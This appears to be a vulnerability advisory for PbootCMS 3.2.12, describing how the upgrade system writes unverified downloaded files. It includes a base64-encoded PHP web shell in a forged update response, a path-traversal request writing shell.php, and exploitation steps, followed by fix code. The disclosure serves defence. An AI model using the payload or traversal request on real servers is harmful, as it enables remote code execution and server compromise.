PbootCMS 3.2.12 - Authenticated RCE via Upgrade System #7
Description
supplier
https://github.com/hnaoyun/PbootCMS
Vulnerability file
apps/admin/controller/system/UpgradeController.php
describe
Code analysis
The upgrade system downloads files from a remote server and writes them to the filesystem without proper integrity verification:
// Line 314-321
private function getServerFile($source, $des)
{
$url = $this->server . '/index.php?p=/upgrade/getFile&branch=' . $this->branch;
$data['path'] = $source;
$file = basename($source);
if (! ! $rs = json_decode(get_url($url, $data, '', true))) {
if ($rs->code) {
if (! file_put_contents($des, base64_decode($rs->data))) { // Writes arbitrary content!
// ...
}
}
}
}
// Line 224-230 - File copy without validation
if (isset($files)) {
foreach ($files as $value) {
if (! copy($value['sfile'], $value['dfile'])) { // Copies files without validation!
// ...
}
}
}The system trusts the remote server completely and writes arbitrary content to the filesystem.
POC
Attack Scenario 1: MITM on update server
- Intercept traffic to
www.pbootcms.com - Modify update response:
{
"code": 1,
"data": "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+" // base64 of <?php system($_GET['cmd']); ?>
}- Admin triggers update
- Malicious code is written to server
Attack Scenario 2: Compromised update server
If www.pbootcms.com is compromised:
- Attacker modifies update files
- All PbootCMS installations receive malicious updates
- Supply chain attack affects all users
Attack Scenario 3: Local file manipulation
POST /admin.php/Upgrade/update HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session
Content-Type: application/x-www-form-urlencoded
list=/../../../shell.phpStep-by-step exploitation:
- Login as admin
- Navigate to
/admin.php/Upgrade - Click "Check Update"
- Intercept the update request
- Modify the file list to include malicious paths
- Trigger update
- Access created shell
Impact
- Remote Code Execution (RCE)
- Complete server compromise
- Supply chain attack potential
- Backdoor installation
- Data exfiltration
Technical Details
The vulnerability exists because:
- No signature verification: Files are not signed or verified
- HTTP used: Update server URL is HTTP (can be intercepted)
- No checksum validation: MD5 is only used for comparison, not security
- Arbitrary file write: Any file path can be written to
- No rate limiting: Unlimited update attempts
Attack vectors:
- DNS spoofing of
www.pbootcms.com - MITM on HTTP connections
- Compromised update server
- Malicious proxy interception
Fix suggestion
// 1. Use HTTPS with certificate validation
private $server = 'https://www.pbootcms.com';
// 2. Verify file signatures
private function verifySignature($file, $signature)
{
$publicKey = file_get_contents(ROOT_PATH . '/config/upgrade_public.key');
return openssl_verify($file, base64_decode($signature), $publicKey, OPENSSL_ALGO_SHA256);
}
// 3. Validate file paths
private function validatePath($path)
{
$realPath = realpath(dirname($path));
$rootPath = realpath(ROOT_PATH);
return strpos($realPath, $rootPath) === 0;
}
// 4. Add integrity check
private function getServerFile($source, $des)
{
// ... existing code ...
// Verify signature
if (!$this->verifySignature(base64_decode($rs->data), $rs->signature)) {
$this->log("File signature verification failed!");
json(0, "File signature verification failed!");
}
// Validate path
if (!$this->validatePath($des)) {
json(0, "Invalid file path!");
}
// Write file
file_put_contents($des, base64_decode($rs->data));
}Additional Recommendations
- Use signed updates with public key cryptography
- Enforce HTTPS with certificate pinning
- Implement file path whitelist
- Add checksum verification after write
- Log all update activities
- Require additional confirmation for updates